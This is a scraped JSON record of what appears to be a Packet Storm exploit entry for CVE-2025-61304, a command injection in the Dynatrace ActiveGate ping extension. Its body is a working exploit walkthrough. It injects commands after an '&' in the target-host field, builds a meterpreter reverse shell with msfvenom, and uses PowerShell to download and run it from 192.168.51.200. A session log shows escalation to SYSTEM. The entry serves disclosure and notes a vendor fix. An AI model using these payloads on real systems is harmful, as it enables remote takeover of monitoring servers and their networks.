{“lastseen”:”2025-10-27T18:52:22″,”description”:”Dynatrace……………………………………”,”published”:”2025-10-27T00:00:00″,”modified”:”2025-10-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Dynatrace ActiveGate Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210930″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-61304″],”sourceData”:”# CVE-2025-61304\\n \\”OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address\\”\\n \\n In the background the ping extension is using the command prompt of Windows to perform the ping. The input field for the Test Target Host is also 1024 chars long. After the ip-address you can write additional commands for the ActiveGate to execute, simply by using an ‘\\u0026’.\\n \\n Reported to Dynatrace and fixed with this commit:\\n https:\/\/github.com\/Dynatrace\/dynatrace-api\/pull\/99\\n \\n Exploit RCE to add user:\\n \\n \\u003cimg width=\\”1261\\” height=\\”957\\” alt=\\”add_user\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/acbfdc73-fe90-4c29-b106-70a283695230\\” \/\\u003e\\n \\n Local user list before and after:\\n \\n \\u003cimg width=\\”1274\\” height=\\”746\\” alt=\\”exploit\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/344948ae-08d6-431c-9101-aa0be2633998\\” \/\\u003e\\n \\n # Other example payloads: \\n \\n 1. Create a meterpreter reverse shell:\\n “`\\n msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe \\u003e mshell.exe\\n “`\\n \\n 2. Download and Execute the shell on the ActiveGate through the Cloud interface using the ping extension:\\n “`\\n google\\u0026powershell.exe $ProgressPreference = ‘SilentlyContinue’; Invoke-WebRequest http:\/\/192.168.51.200\/mshell.exe -OutFile c:\\\\test\\\\mshell.exe\\n \\n google\\u0026c:\\\\test\\\\mshell.exe\\n \\n “`\\n \\n 3. Resulting session\\n “`\\n msf6 exploit(multi\/handler) \\u003e set payload windows\/x64\/meterpreter\/reverse_tcp\\n payload =\\u003e windows\/x64\/meterpreter\/reverse_tcp\\n msf6 exploit(multi\/handler) \\u003e run\\n \\n [*] Started reverse TCP handler on 192.168.51.200:4444 \\n \\n [*] Sending stage (200262 bytes) to 192.168.51.54\\n [*] Meterpreter session 3 opened (192.168.51.200:4444 -\\u003e 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100\\n \\n meterpreter \\u003e getuid\\n Server username: NT AUTHORITY\\\\LOCAL SERVICE\\n meterpreter \\u003e getsystem \\n …got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).\\n meterpreter \\u003e getuid\\n Server username: NT AUTHORITY\\\\SYSTEM\\n \\n meterpreter \\u003e sysinfo\\n Computer : WIN-9493M3CRTDV\\n OS : Windows 2016+ (10.0 Build 17763).\\n Architecture : x64\\n System Language : en_US\\n Domain : WORKGROUP\\n Logged On Users : 1\\n Meterpreter : x64\/windows\\n “`”,”sourceHref”:”https:\/\/packetstorm.news\/download\/210930″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/210930\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-10-27T18:52:22″,”description”:”Dynatrace……………………………………”,”published”:”2025-10-27T00:00:00″,”modified”:”2025-10-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Dynatrace ActiveGate Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210930″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-61304″],”sourceData”:”# CVE-2025-61304\\n \\”OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address\\”\\n \\n In the…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-23531","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n